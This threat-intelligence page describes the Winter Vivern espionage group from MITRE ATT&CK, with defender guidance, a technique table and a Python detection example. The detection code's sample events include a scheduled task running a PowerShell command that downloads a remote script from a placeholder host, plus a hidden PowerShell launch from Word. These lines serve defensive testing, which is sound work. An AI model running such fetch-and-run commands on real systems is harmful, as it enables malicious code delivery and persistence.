G1035: Winter Vivern
Winter Vivern is a group linked to Russian and Belorussian interests active since at least 2020 targeting various European government and NGO entities, along with sporadic targeting of Indian and US victims. The group leverages a combination of document-based phishing activity and server-side exploitation for initial access, leveraging adversary-controlled and -created infrastructure for follow-on command and control.[1][2][3][4][5]
Analyst context for executives and security teams
Winter Vivern matters because ATT&CK describes it as targeting government and NGO entities with document-based phishing and server-side exploitation, followed by adversary-controlled infrastructure for command and control. For leaders, the decision value is not the name of the group; it is whether email, webmail, public-facing applications, endpoint scripting, and outbound web traffic are covered well enough to detect and respond to this style of intrusion before collection and exfiltration occur.
Executive priority
Prioritize this as an exposure and readiness question for organizations with government, NGO, policy, diplomatic, or similarly targeted operations. Ask whether public-facing web applications and webmail are inventoried, patched, logged, and monitored; whether phishing defenses produce usable evidence; and whether SOC and IR teams can trace activity from initial access through discovery, collection, command and control, and exfiltration. The object supports budget focus on email security, vulnerability management for Internet-facing services, endpoint logging, network egress visibility, and incident response playbooks for compromised accounts or web portals.
Technical view
ATT&CK does not provide group-level platforms or detection text for this object, so validation should be built from the described behaviors and relationships. The relationship set includes initial access via Spearphishing Attachment, Malicious Link, Drive-by Compromise, and Exploit Public-Facing Application; execution through command and scripting interpreters including PowerShell, Windows Command Shell, and JavaScript; persistence/execution via Scheduled Task; discovery of users, systems, files, and directories; collection including local email, screen capture, automated collection, and web portal credential capture; C2 over web protocols; ingress tool transfer; and automated or C2-channel exfiltration. SOC teams should test whether they can correlate email/web events, endpoint process and scheduled task activity, public-facing application logs, outbound HTTP/S-like C2 patterns, and data movement indicators into one investigation timeline.
Likely telemetry
- Email security gateway and mailbox telemetry for attachments, links, sender infrastructure, and user interaction
- Public-facing web application and webmail logs, especially authentication, request anomalies, exploitation indicators, file changes, and administrative activity
- Endpoint process creation and command-line telemetry for PowerShell, cmd, JavaScript/script execution, decoding activity, and discovery commands
- Windows Task Scheduler and service/task creation or modification events
- File system telemetry for local email stores, sensitive directory enumeration, staging, and automated collection patterns
Detection direction
- Do not treat this as a single signature problem; validate coverage across the chain from phishing or public-facing exploitation to discovery, collection, C2, and exfiltration.
- Tune phishing detections for targeted attachments and links, but account for false positives from normal government/NGO document exchange and legitimate bulk email workflows.
- For Internet-facing applications and webmail, confirm that logs are centralized and retained long enough to support exploitation investigation, credential-theft triage, and timeline reconstruction.
- Monitor scripting and shell activity in context: unusual PowerShell, cmd, or JavaScript execution is more meaningful when paired with suspicious parent processes, downloaded content, discovery commands, scheduled tasks, or outbound web traffic.
- Review scheduled tasks and masqueraded service/task names against known-good baselines rather than relying only on obviously malicious names.
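One way to exercise the chain-level view described above, as an added example that is not part of the page or of ATT&CK: a small correlation over constructed endpoint and network events that flags a host only when several stages co-occur (document-spawned interpreter, discovery from that interpreter, an unbaselined scheduled task that fetches content over HTTP, and bulk egress to an unapproved destination). The event schema, task-name baseline, and egress allowlist are assumptions for illustration.

```python
from collections import defaultdict

# Constructed sample telemetry (not real data): ws01 shows the chain, ws02 is benign.
EVENTS = [
    {"host": "ws01", "kind": "process", "parent": "WINWORD.EXE",
     "image": "powershell.exe", "cmdline": "powershell -w hidden -File C:\\Users\\Public\\invoice.ps1"},
    {"host": "ws01", "kind": "process", "parent": "powershell.exe",
     "image": "whoami.exe", "cmdline": "whoami"},
    {"host": "ws01", "kind": "sched_task", "name": "WindowsDefenderScan",  # mimics a scanner name
     "action": "powershell -c iwr http://files.example.invalid/update.ps1"},
    {"host": "ws01", "kind": "http", "dest": "files.example.invalid", "bytes_out": 5_400_000},
    {"host": "ws02", "kind": "process", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell -File backup.ps1"},
    {"host": "ws02", "kind": "http", "dest": "updates.corp.example", "bytes_out": 1200},
]

DOC_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
DISCOVERY = {"whoami.exe", "systeminfo.exe", "hostname.exe", "net.exe"}
TASK_BASELINE = {"CorpBackupNightly", "AdobeUpdater"}   # assumed known-good task names
EGRESS_ALLOW = {"updates.corp.example"}                 # assumed approved destinations

def score_host(events):
    """Return the set of chain stages observed in one host's events."""
    stages = set()
    for e in events:
        if e["kind"] == "process":
            parent, image = e["parent"].lower(), e["image"].lower()
            if parent in DOC_APPS and image in INTERPRETERS:
                stages.add("doc_spawned_interpreter")
            if parent in INTERPRETERS and image in DISCOVERY:
                stages.add("discovery_from_interpreter")
        elif e["kind"] == "sched_task":
            # Compare against the baseline, not against "obviously bad" names.
            if e["name"] not in TASK_BASELINE and "http" in e["action"].lower():
                stages.add("unbaselined_task_fetches_payload")
        elif e["kind"] == "http":
            if e["dest"] not in EGRESS_ALLOW and e["bytes_out"] > 1_000_000:
                stages.add("bulk_egress_unapproved_dest")
    return stages

def correlate(events, min_stages=3):
    """Group events per host and keep hosts where at least min_stages stages co-occur."""
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    scored = {h: score_host(evs) for h, evs in by_host.items()}
    return {h: s for h, s in scored.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for host, stages in correlate(EVENTS).items():
        print(host, sorted(stages))
```

Tune `min_stages` and the baselines to the environment; a single stage on its own (a PowerShell launch, one scheduled task) is expected to be noisy and is deliberately not alerted.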
Mitigation priorities
- Start with exposure management for public-facing applications and webmail: maintain an accurate Internet-facing asset inventory, prioritize patching and configuration review, and verify logging is enabled before incidents occur.
- Strengthen phishing resilience with attachment/link controls, user reporting workflows, and investigation processes that preserve email artifacts and user-click evidence.
- Reduce credential risk around externally exposed portals by enforcing strong authentication, monitoring anomalous logins, and reviewing portal integrity where credential capture is a concern.
- Harden endpoint execution paths by governing script interpreters, PowerShell usage, scheduled tasks, and service creation according to business need.
- Improve egress control and monitoring so command and control, tool transfer, and exfiltration over web protocols are visible and can be contained.
Analyst notes and limits
This take is based on the supplied ATT&CK group description, aliases, external reference metadata, and listed technique relationships. The relationship context suggests a broad operational pattern involving phishing, exploitation of public-facing services, scripting, discovery, collection, C2, and exfiltration, but local prioritization should be driven by the organization’s actual exposure, sector, public-facing applications, identity architecture, and available telemetry.
ATT&CK provides no official detection text, no group-level platforms, and no group-level tactics in the supplied fields. Technique platform lists describe the related ATT&CK techniques, not guaranteed Winter Vivern platform scope in any specific environment. External reference titles mention specific webmail technologies, but this response does not infer current exploitation or customer exposure from those references.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1059 | Command and Scripting Interpreter | Winter Vivern used XLM 4.0 macros for initial code execution for malicious document files.[1] |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Winter Vivern uses HTTP and HTTPS protocols for exfiltration and command and control activity.[2][3] |
| Enterprise | T1056.003 | Web Portal Capture Sub-technique | Winter Vivern registered and hosted domains to allow for creation of web pages mimicking legitimate government email logon sites to collect logon information.[2] |
| Enterprise | T1033 | System Owner/User Discovery | Winter Vivern PowerShell scripts execute `whoami` to identify the executing user.[2] |
| Enterprise | T1583.003 | Virtual Private Server Sub-technique | Winter Vivern used adversary-owned and -controlled servers to host web vulnerability scanning applications.[2] |
| Enterprise | T1059.007 | JavaScript Sub-technique | Winter Vivern delivered malicious JavaScript to exploit targets when exploiting Roundcube Webmail servers.[4] |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Winter Vivern leverages malicious attachments delivered via email for initial access activity.[1][2][3] |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | Winter Vivern has distributed malicious scripts and executables mimicking virus scanners.[2] |
| Enterprise | T1113 | Screen Capture | Winter Vivern delivered PowerShell scripts capable of taking screenshots of victim machines.[3] |
| Enterprise | T1189 | Drive-by Compromise | Winter Vivern created dedicated web pages mimicking legitimate government websites to deliver malicious fake anti-virus software.[3] |
| Enterprise | T1119 | Automated Collection | Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.[3] |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Winter Vivern delivered exploit payloads via base64-encoded payloads in malicious email messages.[4] |
| Enterprise | T1020 | Automated Exfiltration | Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.[3] |
| Enterprise | T1105 | Ingress Tool Transfer | Winter Vivern executed PowerShell scripts to create scheduled tasks to retrieve remotely-hosted payloads.[1] |
| Enterprise | T1190 | Exploit Public-Facing Application | Winter Vivern has exploited known and zero-day vulnerabilities in software such as Roundcube Webmail servers and the "Follina" vulnerability.[4][5] |
| Enterprise | T1595.002 | Vulnerability Scanning Sub-technique | Winter Vivern has used remotely-hosted instances of the Acunetix vulnerability scanner.[2] |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Winter Vivern delivered a PowerShell script capable of recursively scanning victim machines looking for various file types before exfiltrating identified files via HTTP.[3] |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | Winter Vivern executed PowerShell scripts that would subsequently attempt to establish persistence by creating scheduled task objects to periodically retrieve and execute remotely-hosted payloads.[1] |
| Enterprise | T1584.006 | Web Services Sub-technique | Winter Vivern has used compromised WordPress sites to host malicious payloads for download.[2] |
| Enterprise | T1036 | Masquerading | Winter Vivern created specially-crafted documents mimicking legitimate government or similar documents during phishing campaigns.[2] |
| Enterprise | T1583.001 | Domains Sub-technique | Winter Vivern registered domains mimicking other entities throughout various campaigns.[1] |
| Enterprise | T1082 | System Information Discovery | Winter Vivern script execution includes basic victim information gathering steps which are then transmitted to command and control servers.[1] |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Winter Vivern distributed Windows batch scripts disguised as virus scanners to prompt download of malicious payloads using built-in system tools.[2][3] |
| Enterprise | T1204.001 | Malicious Link Sub-technique | Winter Vivern has mimicked legitimate government-related domains to deliver malicious webpages containing links to documents or other content for user execution.[2][3] |
| Enterprise | T1083 | File and Directory Discovery | Winter Vivern delivered malicious JavaScript payloads capable of listing folders and emails in exploited email servers.[4] |
| Enterprise | T1114.001 | Local Email Collection Sub-technique | Winter Vivern delivered malicious JavaScript payloads capable of exfiltrating email messages from exploited email servers.[4] |
| Enterprise | T1059.001 | PowerShell Sub-technique | Winter Vivern passed execution from document macros to PowerShell scripts during initial access operations.[1] Winter Vivern used batch scripts that called PowerShell commands as part of initial access and installation operations.[3] |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 8a04cd4c4751… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] DomainTools WinterVivern 2021: Chad Anderson. (2021, April 27). Winter Vivern: A Look At Re-Crafted Government MalDocs Targeting Multiple Languages. Retrieved July 29, 2024.
- [2] SentinelOne WinterVivern 2023: Tom Hegel. (2023, March 16). Winter Vivern | Uncovering a Wave of Global Espionage. Retrieved July 29, 2024.
- [3] CERT-UA WinterVivern 2023: CERT-UA. (2023, February 1). UAC-0114 aka Winter Vivern to target Ukrainian and Polish GOV entities (CERT-UA#5909). Retrieved July 29, 2024.
- [4] ESET WinterVivern 2023: Matthieu Faou. (2023, October 25). Winter Vivern exploits zero-day vulnerability in Roundcube Webmail servers. Retrieved July 29, 2024.
- [5] Proofpoint WinterVivern 2023: Michael Raggi & The Proofpoint Threat Research Team. (2023, March 30). Exploitation is a Dish Best Served Cold: Winter Vivern Uses Known Zimbra Vulnerability to Target Webmail Portals of NATO-Aligned Governments in Europe. Retrieved July 29, 2024.
- [6] TA473 (associated group name; Citation: Proofpoint WinterVivern 2023)
- [7] UAC-0114 (associated group name; Citation: CERT-UA WinterVivern 2023)
- [8] mitre-attack G1035 (source object identifier)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.